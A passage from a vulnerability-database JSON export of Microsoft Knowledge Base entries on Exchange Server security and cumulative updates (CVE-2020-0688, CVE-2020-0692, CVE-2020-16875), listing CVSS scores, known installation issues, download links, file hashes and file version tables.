03-Jan-2020| 05:50| x64 \nVszip.dll| 8.5.3.76| 27,488| 03-Jan-2020| 05:50| x64 \nWatson.config.xml| Not applicable| 36,442| 03-Jan-2020| 05:49| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 143,640| 03-Jan-2020| 05:47| Not applicable \nWeb.config_cb9a6ac9d1164e879b0b2887c9452d4f| Not applicable| 137,151| 03-Jan-2020| 05:49| Not applicable \nWebreadyview.aspx| Not applicable| 1,061| 03-Jan-2020| 05:49| Not applicable \nWebreadyviewbody.aspx| Not applicable| 1,292| 03-Jan-2020| 05:49| Not applicable \nWebreadyviewhead.aspx| Not applicable| 7,406| 03-Jan-2020| 05:49| Not applicable \nWizardproperties.js| Not applicable| 189,547| 03-Jan-2020| 05:46| Not applicable \nWizcmd.exe| 14.3.470.0| 29,896| 03-Jan-2020| 05:49| x86 \nWsbexchange.exe| 14.3.470.0| 131,496| 03-Jan-2020| 05:46| x64 \nWvcore.dll| 8.5.3.76| 3,251,040| 03-Jan-2020| 05:50| x64 \nX400prox.dll| 14.3.470.0| 105,392| 03-Jan-2020| 05:45| x64 \n_02bdcebd3d694db585f8e38f74a7767e_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_083c0d59e0a749f2b10174c00cb6727e_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_24d2e35f00d7423c902e58d04c126642_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_3184a6f4759943848cf58593791ac971_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_3539f8afe1684c36847f808f0c76d024_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_486632cb7cbe412b8a2954012f7e9c7f_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_50ca03193abf48aca295b3ec864fcd68_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_545db0f907844150956a0c069a3a0556_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_5e224a55a0fa465e817e18cec8854723_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_64f60ad194cd4344bca49df649ac7b36_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_68e440eb9ffa4b54b3d7490524f7f878_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_6b0d5c59049a498aa09173d08300a443_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_71a730c62e764989bd2b2d205dd874b4_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_756c11efe6574dba874273443609eb8b_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_791aef9789df465da46941ee38757a31_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_7b9793f8_5acd_4ef8_83a6_46e957c909a0_error.aspx| Not applicable| 8,363| 03-Jan-2020| 05:49| Not applicable \n_7e3dc44156954eacac20b5767cd0ebd7_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_81ebbb77ed854ee784951876098c52e9_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_9495e7eba02649c6a26bea7209a2f1e1_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n_9e665be76e144ac89a7d8b37611b752e_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \n \nHow to get help and support for this security updateProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-11T08:00:00", "type": "mskb", "title": "Description of the security update for Microsoft Exchange Server 2010: February 11, 2020", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2020-02-11T08:00:00", "id": "KB4536989", "href": "https://support.microsoft.com/en-us/help/4536989", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:42:46", "description": "None\nCumulative Update 7 for Microsoft Exchange Server 2019 was released on September 15, 2020. This cumulative update is a security update. It includes fixes for nonsecurity issues and all previously released fixes for security and nonsecurity issues. These fixes will also be included in later [cumulative updates for Exchange Server 2019](<https://docs.microsoft.com/Exchange/new-features/build-numbers-and-release-dates>). This update also resolves a vulnerability, see [Microsoft Common Vulnerabilities and Exposures CVE-2020-16875](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16875>).This update also includes new daylight saving time (DST) updates for Exchange Server 2019. For more information about DST, see Daylight Saving Time Help and Support Center.\n\n## Known issues in this cumulative update\n\n * In multidomain Active Directory forests in which Exchange is installed or has been prepared previously by using the **/PrepareDomain** option in Setup, this action must be completed after the **/PrepareAD** command for this cumulative update has been completed and the changes are replicated to all domains. Setup will try to run the **/PrepareAD** command during the first server installation. Installation will finish only if the user who initiated Setup has the appropriate permissions.\n * **About the /PrepareDomain operation in multidomain:** \n \nThe **/PrepareDomain** operation automatically runs in the Active Directory domain in which the **/PrepareAD **command is run. However, it may be unable to update other domains in the forest. Therefore, a domain administrator should run the **/PrepareDomain** in other domains in the forest.\n * **About the permission question:** \n \nAs the **/PrepareAD** is triggered in Setup, if the user who initiates Setup isn't a member of Schema Admins and Enterprise Admins, the readiness check will fail and you receive the following error messages. \n \n![the Active Directory schema isn't up-to-date error](https://support.content.office.net/en-us/media/fc40be1d-f09e-b1d9-92bf-54a3d5798a95.png) \n \nTo avoid the errors, either the user should join Schema Admins and Enterprise Admins groups or another user in Schema Admins and Enterprise Admins groups manually runs the **/PrepareAD** for this Cumulative Update first. Then, the Exchange admin user can start Setup.\n * Autodiscover Event ID 1 occurs after you install Cumulative Update 3 for Exchange Server 2019. For more information, see KB 4532190.\n * Starting from Exchange Server 2019 CU6, in some cases you might see the string \"&nbsp\" in the body of an item that has been moved between folders or mailboxes using Outlook in Online Mode.\n\n## Issues that this cumulative update fixes\n\nThis cumulative update also fixes the issues that are described in the following Microsoft Knowledge Base articles:\n\n * 4570248 Get-CASMailbox uses wrong LDAP filter for ECPEnabled in Exchange Server 2019\n * 4576652 Updates for Exchange Server 2019 Sizing Calculator version 10.5\n * 4570252 Intermittent poison messages due to NotInBagPropertyErrorException in Exchange Server 2019\n * 4576649 System.InvalidCastException when you change passwords in Outlook on the web in Exchange Server 2019\n * 4570251 Inbox rule applying a personal tag doesn't stamp RetentionDate in Exchange Server 2019\n * 4570245 ESEUtil /p fails if any long value (LV) is corrupted in Exchange Server 2019\n * 4570255 NullReferenceException occurs when running TestFederationTrust in Exchange Server 2019\n * 4576650 Can't add remote mailbox when setting email forwarding in Exchange Server 2019 Hybrid environment\n * 4570253 CompletedWithErrors without details for mailbox migration batches in Exchange Server 2019\n * 4570247 CSV log of Discovery export fails to properly escape target path field in Exchange Server 2019\n * 4570246 EdgeTransport crashes with Event ID 1000 (exception code 0xc00000fd) in Exchange Server 2019\n * 4570254 MSExchangeMapiMailboxAppPool causes prolonged 100% CPU in Exchange Server 2019\n * 4563416 Can't view Online user free/busy status in Exchange Server 2019\n * 4576651 Can't join Teams meetings from Surface Hub devices after installing Exchange Server 2019 CU5\n * 4577352 Description of the security update for Microsoft Exchange Server 2019 and 2016: September 8, 2020\n\n## Get Cumulative Update 7 for Exchange Server 2019\n\n### Volume Licensing Center\n\nTo get Cumulative Update 7 for Exchange Server 2019, go to [Microsoft Volume Licensing Center](<https://www.microsoft.com/Licensing/servicecenter/default.aspx>).**Note** The Cumulative Update 7 package can be used to run a new installation of Exchange Server 2019 or to upgrade an existing Exchange Server 2019 installation to Cumulative Update 7.\n\n## Cumulative update information\n\n### Prerequisites\n\nThis cumulative update requires Microsoft .NET Framework 4.8. A component that's used within Exchange Server requires a new Visual C++ component to be installed together with Exchange Server. This prerequisite can be downloaded at [Visual C++ Redistributable Package for Visual Studio 2012](<https://www.microsoft.com/download/details.aspx?id=30679>).For more information about the prerequisites to set up Exchange Server 2019, see [Exchange 2019 prerequisites](<https://docs.microsoft.com/Exchange/plan-and-deploy/prerequisites>).\n\n### Restart requirement\n\nYou may have to restart the computer after you apply this cumulative update package.\n\n### Registry information\n\nYou don't have to make any changes to the registry after you apply this cumulative update package.\n\n### Removal information\n\nAfter you install this cumulative update package, you can't uninstall the package to revert to an earlier version of Exchange Server 2019. If you uninstall this cumulative update package, Exchange Server 2019 is removed from the server.\n\n## File information\n\n### File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nExchangeServer2019-x64-cu7.iso| 3A0DCD692D82CD9962F793FA8A9E227BDCF74268| 8FFD1F7C9C465671A3E6159BB10958B732B37594798185A9A468EA8E7BDDA770 \n \n## More information\n\nFor more information about the deployment of Exchange Server 2019, see [Release notes for Exchange 2019](<https://docs.microsoft.com/Exchange/release-notes>). \n \nFor more information about the coexistence of Exchange Server 2019 and earlier versions of Exchange Server in the same environment, see [Exchange 2019 system requirements](<https://docs.microsoft.com/Exchange/plan-and-deploy/system-requirements>). \n \nFor more information about other Exchange updates, see [Exchange Server Updates: Build numbers and release dates](<https://docs.microsoft.com/Exchange/new-features/build-numbers-and-release-dates>).\n\n## References\n\nLearn about the terminology that Microsoft uses to describe software updates.\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T08:00:00", "type": "mskb", "title": "Cumulative Update 7 for Exchange Server 2019", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1730", "CVE-2020-16875"], "modified": "2021-02-09T08:00:00", "id": "KB4571787", "href": "https://support.microsoft.com/en-us/help/4571787", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-31T15:42:48", "description": "None\nCumulative Update 18 for Microsoft Exchange Server 2016 was released on September 15, 2020. This cumulative update includes fixes for nonsecurity issues and all previously released fixes for security and nonsecurity issues. These fixes will also be included in later [cumulative updates for Exchange Server 2016](<https://docs.microsoft.com/Exchange/new-features/build-numbers-and-release-dates>). This update also resolves a vulnerability, see [Microsoft Common Vulnerabilities and Exposures CVE-2020-16875](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16875>).This update also includes new daylight saving time (DST) updates for Exchange Server 2016. For more information about DST, see Daylight Saving Time Help and Support Center.\n\n## Known issues in this cumulative update\n\n * In multidomain Active Directory forests in which Exchange is installed or has been prepared previously by using the **/PrepareDomain** option in Setup, this action must be completed after the **/PrepareAD** command for this cumulative update has been completed and the changes are replicated to all domains. Setup will try to run the **/PrepareAD** command during the first server installation. Installation will finish only if the user who initiated Setup has the appropriate permissions.\n * **About the /PrepareDomain operation in multidomain:** \n \nThe **/PrepareDomain** operation automatically runs in the Active Directory domain in which the **/PrepareAD **command is run. However, it may be unable to update other domains in the forest. Therefore, a domain administrator should run the **/PrepareDomain** in other domains in the forest.\n * **About the permission question:** \n \nAs the **/PrepareAD** is triggered in Setup, if the user who initiates Setup isn't a member of Schema Admins and Enterprise Admins, the readiness check will fail and you receive the following error messages. \n \n![the Active Directory schema isn't up-to-date error](https://support.content.office.net/en-us/media/fc40be1d-f09e-b1d9-92bf-54a3d5798a95.png) \n \nTo avoid the errors, either the user should join Schema Admins and Enterprise Admins groups or another user in Schema Admins and Enterprise Admins groups manually runs the **/PrepareAD** for this Cumulative Update first. Then the Exchange admin user can start Setup.\n * Autodiscover Event ID 1 occurs after you install Cumulative Update 14 for Exchange Server 2016. For more information, see KB 4532190.\n * Starting from Exchange Server 2016 CU17, in some cases you might see the string \"&nbsp\" in the body of an item that has been moved between folders or mailboxes using Outlook in Online Mode.\n\n## Issues that this cumulative update fixes\n\nThis cumulative update fixes the issues that are described in the following Microsoft Knowledge Base articles: \n\n * 4570248 Get-CASMailbox uses wrong LDAP filter for ECPEnabled in Exchange Server 2016\n * 4570252 Intermittent poison messages due to NotInBagPropertyErrorException in Exchange Server 2016\n * 4576649 System.InvalidCastException when you change passwords in Outlook on the web in Exchange Server 2016\n * 4570251 Inbox rule applying a personal tag doesn't stamp RetentionDate in Exchange Server 2016\n * 4570245 ESEUtil /p fails if any long value (LV) is corrupted in Exchange Server 2016\n * 4570255 NullReferenceException occurs when you run TestFederationTrust in Exchange Server 2016\n * 4576650 Can't add remote mailbox when setting email forwarding in Exchange Server 2016 Hybrid environment\n * 4570253 CompletedWithErrors without details for mailbox migration batches in Exchange Server 2016\n * 4570247 CSV log of Discovery export fails to properly escape target path field in Exchange Server 2016\n * 4570246 EdgeTransport crashes with Event ID 1000 (exception code 0xc00000fd) in Exchange Server 2016\n * 4570254 MSExchangeMapiMailboxAppPool causes prolonged 100% CPU in Exchange Server 2016\n * 4563416 Can't view Online user free/busy status in Exchange Server 2016\n * 4576651 Can't join Teams meetings from Surface Hub devices after installing Exchange Server 2016 CU16\n * 4577352 Description of the security update for Microsoft Exchange Server 2019 and 2016: September 8, 2020\n\n## Get Cumulative Update 18 for Exchange Server 2016\n\n### Download Center\n\n![Download ](https://support.content.office.net/en-us/media/dea9ad89-e39c-09ee-0d36-67beddb48e26.png)[Download Cumulative Update 18 for Exchange Server 2016 (KB4571788) now](<http://www.microsoft.com/download/details.aspx?FamilyID=42086856-b6eb-4c6c-96cd-1c9d33a07d04>)![Download ](https://support.content.office.net/en-us/media/dea9ad89-e39c-09ee-0d36-67beddb48e26.png)[Download Exchange Server 2016 CU18 UM Language Packs now](<http://www.microsoft.com/download/details.aspx?FamilyID=99d303cb-4815-4466-a924-328beaebfca2>)**Notes**\n\n * The Cumulative Update 18 package can be used to run a new installation of Exchange Server 2016 or to upgrade an existing Exchange Server 2016 installation to Cumulative Update 18.\n * You don't have to install any previously released Exchange Server 2016 cumulative updates or service packs before you install Cumulative Update 18.\n\n## Cumulative update information\n\n### Prerequisites\n\nThis cumulative update requires Microsoft .NET Framework 4.8. A component that's used within Exchange Server requires a new Visual C++ component to be installed together with Exchange Server. This prerequisite can be downloaded at [Visual C++ Redistributable Packages for Visual Studio 2013](<https://www.microsoft.com/download/details.aspx?id=40784>). For more information, see [KB 4295081](<https://support.microsoft.com/help/4295081>).For more information about the prerequisites to set up Exchange Server 2016, see [Exchange 2016 prerequisites](<https://docs.microsoft.com/Exchange/plan-and-deploy/prerequisites>).\n\n### Restart requirement\n\nYou may have to restart the computer after you apply this cumulative update package.\n\n### Registry information\n\nYou don't have to make any changes to the registry after you apply this cumulative update package.\n\n### Removal information\n\nAfter you install this cumulative update package, you can't uninstall the package to revert to an earlier version of Exchange Server 2016. If you uninstall this cumulative update package, Exchange Server 2016 is removed from the server.\n\n## File information\n\n### File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nExchangeServer2016-x64-cu18.iso| 2AD6C38683824718751EAE97BCABF292D9638436| A10EC45C74C2E65E76FE03C8AAD4960CBE331629ED4D6C9592E18183AF662EBC \n \n## More information\n\nFor more information about the deployment of Exchange Server 2016, see [Release notes for Exchange 2016](<https://docs.microsoft.com/Exchange/release-notes>). \n \nFor more information about the coexistence of Exchange Server 2016 and earlier versions of Exchange Server in the same environment, see [Exchange 2016 system requirements](<https://docs.microsoft.com/Exchange/plan-and-deploy/system-requirements>). \n \nFor more information about other Exchange updates, see [Exchange Server Updates: Build numbers and release dates](<https://docs.microsoft.com/Exchange/new-features/build-numbers-and-release-dates>).\n\n## References\n\nLearn about the terminology that Microsoft uses to describe software updates.\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T08:00:00", "type": "mskb", "title": "Cumulative Update 18 for Exchange Server 2016", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1730", "CVE-2020-16875"], "modified": "2021-02-09T08:00:00", "id": "KB4571788", "href": "https://support.microsoft.com/en-us/help/4571788", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:02:47", "description": "None\nThis update rollup is a security update that resolves vulnerabilities in Microsoft Exchange Server. To learn more about these vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):\n\n * [CVE-2020-0692 | Microsoft Exchange Server Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0692>)\n * [CVE-2020-0688 | Microsoft Exchange Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0688>)\n\n## Known issues in this security update\n\n * When you try to manually install this security update by double-clicking the update file (.msp) to run it in Normal mode (that is, not as an administrator), some files are not correctly updated.When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) may stop working. \n \nThis issue occurs on servers that are using user account control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.To avoid this issue, follow these steps to manually install this security update:\n 1. Select **Start**, and type **cmd**.\n 2. In the results, right-click **Command Prompt**, and then select **Run as administrator**.\n 3. If the **User Account Control** dialog box appears, verify that the default action is the action that you want, and then select **Continue**.\n 4. Type the full path of the .msp file, and then press Enter.\nThis issue does not occur when you install the update through Microsoft Update.\n * Exchange services may remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition may occur if the service control scripts experience a problem when they try to return Exchange services to their usual state. \n \nTo fix this issue, use Services Manager to restore the startup type to **Automatic**, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see [Start a Command Prompt as an Administrator](<https://technet.microsoft.com/en-us/library/cc947813\$v=ws.10\$.aspx>).\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4536987>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center.\n\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download Security Update For Exchange Server 2019 Cumulative Update 4 (KB4536987)](<http://www.microsoft.com/download/details.aspx?familyid=6f5e2305-f1dc-4ce9-97c5-4d6fc1b87a24>)\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download Security Update For Exchange Server 2019 Cumulative Update 3 (KB4536987)](<http://www.microsoft.com/download/details.aspx?familyid=dec0d147-8b43-4fee-94cb-ed43ed1226ad>)\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download Security Update For Exchange Server 2016 Cumulative Update 15 (KB4536987)](<http://www.microsoft.com/download/details.aspx?familyid=a4bd9a4e-56f4-42c2-b0d7-fffe52c5dbe5>)\n * ![Download icon](https://support.content.office.net/en-us/media/2ae362dc-2179-d733-e930-e231c68a2c4a.png)[Download Security Update For Exchange Server 2016 Cumulative Update 14 (KB4536987)](<http://www.microsoft.com/download/details.aspx?familyid=5ae7346b-f59c-415d-b576-e50f6b493a23>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: February 11, 2020](<https://support.microsoft.com/help/20200211>). \n\n### Security update replacement information\n\nThis security update replaces the following previously released updates:\n\n * Description of the security update for Microsoft Exchange Server 2016, and 2019: November 12, 2019\n\n## File information\n\n### File hash information\n\nUpdate name| File name| SHA1 hash| SHA256 hash \n---|---|---|--- \nExchange Server 2019 Cumulative Update 4| Exchange2019-KB4536987-x64-en.msp| F040FFC72F38658BC9B77DF8E368698B70CB825C| 774A68E5B4462A6807B34AACD1ABE36901A31C6B1C7AD0270225A2C0C62B2478 \nExchange Server 2019 Cumulative Update 3| Exchange2019-KB4536987-x64-en.msp| F936D367F8AD3F8965BFDDB61FFCFF3BFC107013| 78851F1ECD036A768181F9938CF9CFF79FE3D0BD45A4132A22C3587B7D9379C2 \nExchange Server 2016 Cumulative Update 15| Exchange2016-KB4536987-x64-en.msp| 864C4A38668A914A4F75DDF679555CFB8F0D4065| 6DC7F1CEBCDBCA95FE33C2168426B0AC8BD14F31079B12C759A68F35F6FC3352 \nExchange Server 2016 Cumulative Update 14| Exchange2016-KB4536987-x64-en.msp| 68E8E81FB24045AE4EA18862B744BCF5A2CCAE6E| 68D642697F7BE93E5070DB0B198918C43D6B05BA7FC62D2322A2C6FE8BB9D171 \n \n### Exchange server file information\n\nThe English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nExchange Server 2019 Cumulative Update 4\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.2.529.8| 71,032| 01-Jan-2020| 11:20| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,802| 01-Jan-2020| 11:22| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,925| 01-Jan-2020| 11:21| Not applicable \nAdemodule.dll| 15.2.529.8| 106,368| 01-Jan-2020| 11:20| x64 \nAirfilter.dll| 15.2.529.8| 42,872| 01-Jan-2020| 11:21| x64 \nAjaxcontroltoolkit.dll| 15.2.529.8| 92,752| 01-Jan-2020| 11:20| x86 \nAntispamcommon.ps1| Not applicable| 13,485| 01-Jan-2020| 11:21| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 01-Jan-2020| 11:22| Not applicable \nAsentirs.msi| Not applicable| 77,824| 01-Jan-2020| 11:22| Not applicable \nAsentsig.msi| Not applicable| 73,728| 01-Jan-2020| 11:21| Not applicable \nBigfunnel.bondtypes.dll| 15.2.529.8| 45,432| 01-Jan-2020| 11:20| x86 \nBigfunnel.common.dll| 15.2.529.8| 66,424| 01-Jan-2020| 11:20| x86 \nBigfunnel.configuration.dll| 15.2.529.8| 118,352| 01-Jan-2020| 11:20| x86 \nBigfunnel.entropy.dll| 15.2.529.8| 44,408| 01-Jan-2020| 11:20| x86 \nBigfunnel.filter.dll| 15.2.529.8| 54,136| 01-Jan-2020| 11:21| x86 \nBigfunnel.indexstream.dll| 15.2.529.8| 68,992| 01-Jan-2020| 11:21| x86 \nBigfunnel.neuraltree.dll| Not applicable| 694,144| 01-Jan-2020| 11:19| x64 \nBigfunnel.neuraltreeranking.dll| 15.2.529.8| 19,832| 01-Jan-2020| 11:20| x86 \nBigfunnel.poi.dll| 15.2.529.8| 245,320| 01-Jan-2020| 11:21| x86 \nBigfunnel.postinglist.dll| 15.2.529.8| 189,304| 01-Jan-2020| 11:19| x86 \nBigfunnel.query.dll| 15.2.529.8| 101,240| 01-Jan-2020| 11:21| x86 \nBigfunnel.ranking.dll| 15.2.529.8| 109,648| 01-Jan-2020| 11:20| x86 \nBigfunnel.syntheticdatalib.dll| 15.2.529.8| 3,634,760| 01-Jan-2020| 11:21| x86 \nBigfunnel.tracing.dll| 15.2.529.8| 42,872| 01-Jan-2020| 11:19| x86 \nBigfunnel.wordbreakers.dll| 15.2.529.8| 46,464| 01-Jan-2020| 11:20| x86 \nCafe_airfilter_dll| 15.2.529.8| 42,872| 01-Jan-2020| 11:21| x64 \nCafe_exppw_dll| 15.2.529.8| 83,320| 01-Jan-2020| 11:21| x64 \nCafe_owaauth_dll| 15.2.529.8| 92,024| 01-Jan-2020| 11:20| x64 \nCalcalculation.ps1| Not applicable| 42,093| 01-Jan-2020| 11:22| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,902| 01-Jan-2020| 11:21| Not applicable \nChksgfiles.dll| 15.2.529.8| 57,416| 01-Jan-2020| 11:22| x64 \nCitsconstants.ps1| Not applicable| 15,805| 01-Jan-2020| 11:20| Not applicable \nCitslibrary.ps1| Not applicable| 82,956| 01-Jan-2020| 11:21| Not applicable \nCitstypes.ps1| Not applicable| 14,760| 01-Jan-2020| 11:21| Not applicable \nClassificationengine_mce| 15.2.529.8| 1,693,264| 01-Jan-2020| 11:21| Not applicable \nClusmsg.dll| 15.2.529.8| 134,008| 01-Jan-2020| 11:21| x64 \nCoconet.dll| 15.2.529.8| 48,000| 01-Jan-2020| 11:19| x64 \nCollectovermetrics.ps1| Not applicable| 81,948| 01-Jan-2020| 11:20| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,870| 01-Jan-2020| 11:21| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 30,235| 01-Jan-2020| 11:20| Not applicable \nComplianceauditservice.exe| 15.2.529.8| 39,808| 01-Jan-2020| 11:22| x86 \nConfigureadam.ps1| Not applicable| 23,068| 01-Jan-2020| 11:21| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,308| 01-Jan-2020| 11:21| Not applicable \nConfigurecryptodefaults.ps1| Not applicable| 42,035| 01-Jan-2020| 11:22| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,766| 01-Jan-2020| 11:21| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,824| 01-Jan-2020| 11:21| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,283| 01-Jan-2020| 11:21| Not applicable \nConnectfunctions.ps1| Not applicable| 37,421| 01-Jan-2020| 11:22| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 29,604| 01-Jan-2020| 11:22| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,528| 01-Jan-2020| 11:22| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,053| 01-Jan-2020| 11:21| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,836| 01-Jan-2020| 11:21| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,761| 01-Jan-2020| 11:21| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,908| 01-Jan-2020| 11:21| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 01-Jan-2020| 09:08| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 01-Jan-2020| 09:08| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 01-Jan-2020| 09:08| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 01-Jan-2020| 09:08| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 01-Jan-2020| 09:08| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 501| 01-Jan-2020| 09:08| Not applicable 